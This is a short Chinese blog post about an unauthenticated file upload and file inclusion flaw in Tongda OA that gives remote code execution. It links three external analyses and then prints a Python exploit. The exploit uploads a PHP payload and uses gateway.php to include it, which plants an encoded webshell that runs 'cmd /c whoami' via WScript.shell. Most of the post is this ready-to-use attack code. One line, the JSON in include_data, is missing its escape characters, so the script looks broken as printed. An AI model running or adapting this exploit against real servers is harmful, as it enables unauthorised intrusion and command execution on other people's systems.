通达OA未授权任意文件上传及文件包含导致远程代码执行漏洞
本来想分析一下,后来发现文件都是加密的,虽然说代码是PHPzend 5.4加密的,可以解密,但是兴趣过了,就发一下师傅的分析过程和exp吧:
1,http://blog.fuzz.pub/2020/03/17/通达oa RCE 分析/#more
2,https://www.t00ls.net/articles-55461.html
3,https://www.anquanke.com/post/id/201174
exp:
import os
import requests
# author :print("")
proxies = {
"http": "http://127.0.0.1:8080",
"https": "http://127.0.0.1:8080",
}
if not os.path.exists('1.txt'):
f=open('1.txt','w')
f.write('''<?php
$fp = fopen('readme.php', 'w');
$a = base64_decode("JTNDJTNGcGhwJTBBJTI0Y29tbWFuZCUzRCUyMndob2FtaSUyMiUzQiUwQSUyNHdzaCUyMCUzRCUyMG5ldyUyMENPTSUyOCUyN1dTY3JpcHQuc2hlbGwlMjclMjklM0IlMEElMjRleGVjJTIwJTNEJTIwJTI0d3NoLSUzRWV4ZWMlMjglMjJjbWQlMjAvYyUyMCUyMi4lMjRjb21tYW5kJTI5JTNCJTBBJTI0c3Rkb3V0JTIwJTNEJTIwJTI0ZXhlYy0lM0VTdGRPdXQlMjglMjklM0IlMEElMjRzdHJvdXRwdXQlMjAlM0QlMjAlMjRzdGRvdXQtJTNFUmVhZEFsbCUyOCUyOSUzQiUwQWVjaG8lMjAlMjRzdHJvdXRwdXQlM0IlMEElM0YlM0U=");
fwrite($fp, urldecode($a));
fclose($fp);
?>
''')
f.close()
upload_url = "http://192.168.1.145:8181/ispirit/im/upload.php"
include_url = "http://192.168.1.145:8181/ispirit/interface/gateway.php"
shell_url="http://192.168.1.145:8181/ispirit/interface/readme.php"
files = {'ATTACHMENT':open('1.txt','r')}
upload_data={"P":"123","DEST_UID":"1","UPLOAD_MODE":"2"}
upload_res = requests.post(upload_url,upload_data,files=files,proxies=proxies)
path = upload_res.text
path = path[path.find('@')+1:path.rfind('|')].replace("_","/").replace("|",".")
include_data = {"json":"{"url":"/general/../../attach/im/" +path+""}"}
include_res = requests.post(include_url,data=include_data,proxies=proxies)
shell_res=requests.get(shell_url)
print(shell_res.text)